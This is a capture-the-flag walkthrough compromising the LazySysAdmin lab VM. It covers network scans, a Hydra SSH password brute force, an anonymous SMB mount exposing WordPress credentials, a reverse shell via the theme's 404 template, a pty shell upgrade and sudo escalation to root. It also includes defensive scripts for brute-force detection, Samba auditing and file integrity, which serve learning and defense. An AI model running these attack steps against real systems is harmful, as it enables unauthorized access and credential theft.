Information gathering
Start the virtual machine
Scan the whole subnet to find the target's IP address, then scan that host:
┌──(root㉿kali)-[~]
└─# nmap -sN -T4 192.168.59.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-01 05:32 EDT
Nmap scan report for 192.168.59.137
Host is up (0.00028s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
139/tcp open|filtered netbios-ssn
445/tcp open|filtered microsoft-ds
3306/tcp open|filtered mysql
6667/tcp open|filtered irc
MAC Address: 00:0C:29:12:7D:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds
After the subnet scan, run a port scan to see which ports are open and which services sit on them. Note that -sN is a TCP NULL scan, which is why every port is reported as open|filtered: a NULL scan cannot tell an open port from a filtered one, so a SYN or connect scan (-sS or -sT) with -sV is needed for a definitive state and service versions.
Since port 139 is open, enumerate the SMB shares:
┌──(root㉿kali)-[/usr/share/wordlists]
└─# enum4linux 192.168.59.137
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jul 1 06:37:25 2024
=========================================( Target Information )=========================================
Target ........... 192.168.59.137
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
Found a share that needs no username or password; the Admin password was found through that share.
Threat modeling and vulnerability analysis
Looked at port 80. dirb gave a fairly complete scan; dirsearch did not find what was needed.
┌──(root㉿kali)-[~]
└─# dirb http://192.168.59.137
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jul 1 05:52:22 2024
URL_BASE: http://192.168.59.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.59.137/ ----
==> DIRECTORY: http://192.168.59.137/apache/
+ http://192.168.59.137/index.html (CODE:200|SIZE:36072)
+ http://192.168.59.137/info.php (CODE:200|SIZE:77268)
==> DIRECTORY: http://192.168.59.137/javascript/
==> DIRECTORY: http://192.168.59.137/old/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/
+ http://192.168.59.137/robots.txt (CODE:200|SIZE:92)
+ http://192.168.59.137/server-status (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.59.137/test/
==> DIRECTORY: http://192.168.59.137/wordpress/
==> DIRECTORY: http://192.168.59.137/wp/
---- Entering directory: http://192.168.59.137/apache/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/javascript/ ----
==> DIRECTORY: http://192.168.59.137/javascript/jquery/
---- Entering directory: http://192.168.59.137/old/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/phpmyadmin/ ----
+ http://192.168.59.137/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.59.137/phpmyadmin/index.php (CODE:200|SIZE:8263)
==> DIRECTORY: http://192.168.59.137/phpmyadmin/js/
+ http://192.168.59.137/phpmyadmin/libraries (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/
+ http://192.168.59.137/phpmyadmin/phpinfo.php (CODE:200|SIZE:8265)
+ http://192.168.59.137/phpmyadmin/setup (CODE:401|SIZE:460)
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/
---- Entering directory: http://192.168.59.137/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/ ----
+ http://192.168.59.137/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-content/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-includes/
+ http://192.168.59.137/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.59.137/wp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/javascript/jquery/ ----
+ http://192.168.59.137/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.59.137/javascript/jquery/version (CODE:200|SIZE:5)
---- Entering directory: http://192.168.59.137/phpmyadmin/js/ ----
==> DIRECTORY: http://192.168.59.137/phpmyadmin/js/jquery/
---- Entering directory: http://192.168.59.137/phpmyadmin/locale/ ----
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ar/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/bg/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ca/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/cs/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/da/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/de/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/el/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/es/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/et/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/fi/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/fr/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/gl/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/hi/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/hr/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/hu/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/id/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/it/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ja/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ko/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/lt/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/nl/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/pl/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/pt/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/pt_BR/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ro/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ru/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/si/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/sk/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/sl/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/sv/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/th/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/tr/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/uk/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/zh_CN/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/zh_TW/
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/original/
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/ ----
+ http://192.168.59.137/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/includes/
+ http://192.168.59.137/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/user/
---- Entering directory: http://192.168.59.137/wordpress/wp-content/ ----
+ http://192.168.59.137/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.59.137/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.59.137/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
----
---- Entering directory: http://192.168.59.137/phpmyadmin/locale/zh_TW/ ----
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/original/css/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/original/img/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/original/jquery/
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/network/ ----
+ http://192.168.59.137/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.59.137/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/user/ ----
+ http://192.168.59.137/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.59.137/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.59.137/wordpress/wp-content/plugins/ ----
+ http://192.168.59.137/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.59.137/wordpress/wp-content/themes/ ----
+ http://192.168.59.137/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.59.137/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/original/css/ ----
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/original/img/ ----
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/original/jquery/ ----
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/original/jquery/images/
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/original/jquery/images/ ----
-----------------
END_TIME: Mon Jul 1 05:55:10 2024
DOWNLOADED: 253660 - FOUND: 22
Found a page, and the CMS is WordPress, an open-source framework.
Also found a login page:
http://192.168.59.137/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.59.137%2Fwordpress%2Fwp-admin%2F&reauth=1
Couldn't get Medusa to work properly; used the rockyou.txt wordlist that ships with Kali.
┌──(root㉿kali)-[~]
└─# medusa -h 192.168.59.137 -u togie -p /usr/share/wordlists/rockyou.txt -M ssh
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.59.137 (1 of 1, 0 complete) User: togie (1 of 1, 0 complete) Password: /usr/share/wordlists/rockyou.txt (1 of 1 complete)
Hydra works well:
┌──(root㉿kali)-[~]
└─# hydra -l togie -P /usr/share/wordlists/rockyou.txt ssh://192.168.59.137 -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-01 06:26:46
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.59.137:22/
[22][ssh] host: 192.168.59.137 **login: togie password: 12345**
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-01 06:27:06
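The Hydra run above leaves a very recognisable trace on the target: a burst of "Failed password" lines in /var/log/auth.log from one source address, followed by an "Accepted password" for the same user. The following script is an added example, not part of the original walkthrough, that parses constructed sshd log lines in that format and flags the pattern; the attacker address 192.168.59.128 and the timestamps are assumptions, only the host name and user come from the page.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of OpenSSH auth.log lines (not taken from the page).
# 192.168.59.128 is an assumed attacker host; LazySysAdmin and togie are from the walkthrough.
SAMPLE_AUTH_LOG = """\
Jul  1 06:26:47 LazySysAdmin sshd[2411]: Failed password for togie from 192.168.59.128 port 51012 ssh2
Jul  1 06:26:48 LazySysAdmin sshd[2413]: Failed password for togie from 192.168.59.128 port 51014 ssh2
Jul  1 06:26:50 LazySysAdmin sshd[2415]: Failed password for togie from 192.168.59.128 port 51016 ssh2
Jul  1 06:26:53 LazySysAdmin sshd[2417]: Failed password for togie from 192.168.59.128 port 51018 ssh2
Jul  1 06:26:57 LazySysAdmin sshd[2419]: Failed password for togie from 192.168.59.128 port 51020 ssh2
Jul  1 06:27:02 LazySysAdmin sshd[2421]: Failed password for togie from 192.168.59.128 port 51022 ssh2
Jul  1 06:27:06 LazySysAdmin sshd[2440]: Accepted password for togie from 192.168.59.128 port 51040 ssh2
Jul  1 06:30:00 LazySysAdmin sshd[2501]: Accepted publickey for deploy from 192.168.59.10 port 40022 ssh2
"""

# Matches the outcome lines sshd writes for password and public-key logins.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_auth_log(text, year=2024):
    """Turn sshd auth.log lines into (timestamp, result, user, ip) tuples.
    syslog lines carry no year, so the caller supplies it."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an sshd login-outcome line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold=5, window_s=60):
    """Flag source IPs with at least `threshold` failures inside a sliding window
    of `window_s` seconds, and record whether a successful login from that IP
    followed: that is the signal that the guessing actually worked."""
    recent = defaultdict(list)  # ip -> failure timestamps still inside the window
    alerts = {}
    for ts, result, user, ip in sorted(events):
        if result == "Failed":
            window = recent[ip]
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_s:
                window.pop(0)  # expire failures older than the window
            if len(window) >= threshold:
                entry = alerts.setdefault(ip, {"failures": 0, "success_after": None})
                entry["failures"] = max(entry["failures"], len(window))
        elif ip in alerts:
            # an Accepted login from an IP already flagged for guessing
            alerts[ip]["success_after"] = user
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, alert)
```

Against the sample the flagged address shows six failures in the window and success_after set to togie, while the key-based login from 192.168.59.10 is never flagged. A real deployment would read the log incrementally and feed the alert into whatever bans the source or pages an analyst.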
The login page needs a password; the username turns out to be Admin.
Since SMB is among the open services, try connecting to it remotely; it connected straight away.
Exploitation
SMB remote file share connection:
mount -t cifs -o username='',password='' '//192.168.59.137/share$' /mnt
Once mounted, look for the WordPress configuration file:
user:Admin
password:TogieMYSQL12345^^
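Both the enum4linux finding above (a share with an empty username and password) and the anonymous mount here come down to one Samba setting: a share with guest ok = yes, often combined with map to guest in [global]. The script below is an added example, not the box's real configuration or code: it embeds a constructed weak smb.conf fragment next to a hardened one and audits both for shares reachable without credentials. The share name share$ and the web-root path follow the walkthrough; the group name webadmins and all other values are assumptions.

```python
# Constructed smb.conf fragments (not the target's real configuration).
# share$ and the web-root path follow the walkthrough; everything else is assumed.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = bad user

[share$]
   path = /var/www/html
   browseable = no
   guest ok = yes
   read only = yes
"""

HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = never

[share$]
   path = /var/www/html
   browseable = no
   guest ok = no
   valid users = @webadmins
   read only = yes
"""

YES = {"yes", "true", "1"}


def _is_yes(value):
    return value.strip().lower() in YES


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {key: value}} with lower-cased keys;
    ';' and '#' comment lines are skipped. Enough for an audit, not a full parser."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return findings for settings that expose shares without credentials."""
    conf = parse_smb_conf(text)
    findings = []
    map_to_guest = conf.get("global", {}).get("map to guest", "never").lower()
    if map_to_guest != "never":
        findings.append(f"[global] map to guest = {map_to_guest}: unknown or failed logins fall back to the guest account")
    for name, opts in conf.items():
        if name == "global":
            continue
        # 'public' is Samba's synonym for 'guest ok'
        guest = _is_yes(opts.get("guest ok", opts.get("public", "no")))
        if guest:
            writable = _is_yes(opts.get("writable", opts.get("writeable", "no"))) \
                or not _is_yes(opts.get("read only", "yes"))
            mode = "writable" if writable else "readable"
            findings.append(f"[{name}] guest ok = yes: {opts.get('path', '?')} is {mode} without a username or password")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, audit_smb_conf(conf) or ["no findings"])
```

The weak fragment yields two findings (the global guest fallback and the guest-readable share$); the hardened one yields none because the share requires a named group and guest mapping is off. The wider lesson from the walkthrough is that the web root, including wp-config.php with its database credentials, should never be exported on a share at all.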
Open the 404 template in the WordPress theme editor and upload the reverse-shell script there
Browse the directories to find where the 404 file is located
Start an nc listener and request the file
Now inside the system
Checking: the user is www-data
Use Python to spawn a proper bash shell:
python -c "import pty;pty.spawn('/bin/bash')"
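The foothold above comes from editing a theme file (the 404 template) through the WordPress admin, which is exactly what a file-integrity baseline of wp-content/themes catches. The script below is an added example, not code from the page or from WordPress: it hashes every file under a theme directory, then diffs a later snapshot against the baseline. The demo builds a constructed theme in a temporary directory (placeholder theme name and contents, both assumptions) and simulates the 404 template being replaced and an extra PHP file appearing.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(root):
    """Map every file under root (as a relative POSIX path) to its SHA-256."""
    root = Path(root)
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            result[path.relative_to(root).as_posix()] = digest
    return result


def diff_snapshots(baseline, current):
    """Report files added, removed, or whose content hash changed."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def demo():
    # Constructed theme directory; 'placeholder-theme' and the file bodies are assumptions.
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "wp-content" / "themes" / "placeholder-theme"
        theme.mkdir(parents=True)
        (theme / "404.php").write_text("<?php get_header(); ?>\n<h1>Not found</h1>\n")
        (theme / "style.css").write_text("/* Theme Name: placeholder-theme */\n")
        baseline = snapshot(theme)  # taken at deploy time, stored off-host

        # Simulate what the walkthrough describes: the 404 template is replaced
        # through the theme editor, and a new PHP file lands in the theme.
        (theme / "404.php").write_text("<?php /* template contents replaced */ ?>\n")
        (theme / "tmp.php").write_text("<?php /* file that was not there before */ ?>\n")

        return diff_snapshots(baseline, snapshot(theme))


if __name__ == "__main__":
    print(demo())
```

The demo reports 404.php as modified and tmp.php as added. On a real install the baseline would be taken right after deployment and kept somewhere the web server account cannot write; in addition, setting DISALLOW_FILE_EDIT in wp-config.php removes the theme editor that made the change possible in the first place.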
Connect via SSH:
┌──(root㉿kali)-[~]
└─# ssh togie@192.168.59.137
The authenticity of host '192.168.59.137 (192.168.59.137)' can't be established.
ED25519 key fingerprint is SHA256:95rO1jtge1Ag8dmmSGET2f806aQjiTODoBpDoEeefaw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.59.137' (ED25519) to the list of known hosts.
##################################################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
##################################################################################################
togie@192.168.59.137's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Mon Jul 1 20:27:04 AEST 2024
System load: 0.0 Processes: 181
Usage of /: 47.5% of 2.89GB Users logged in: 0
Memory usage: 38% IP address for eth0: 192.168.59.137
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
133 packages can be updated.
0 updates are security updates.
togie@LazySysAdmin:~$ ls
togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ ls
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:~$ sudo su root
[sudo] password for togie:
root@LazySysAdmin:/home/togie# ls
root@LazySysAdmin:/home/togie# dir
root@LazySysAdmin:/home/togie# cd
root@LazySysAdmin:~# ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
Found the flag directly.
Post-exploitation and privilege escalation
Flag captured. The escalation is just the sudo su root step in the session above: togie is in the sudo group (27(sudo) in the id output), so the same weak password Hydra found also gives root.
Summary
First, use different scanners: scan the subnet, then the ports, and once that is done look at which services are running.
Try port 80 first, since it has a web interface, but it is relatively laborious; personally I find going in through the web application slower than SSH.
Then try port 22: SSH, brute-forcing the account password with Hydra. It worked because the password was weak; once connected it pays off enormously and saves many steps.
Then port 139, the file share: the Admin password was found there, and it also makes setting up the 404 page on port 80 easier.
Everyone else works from experience, so attack more practice boxes, practise more, and get more hands-on.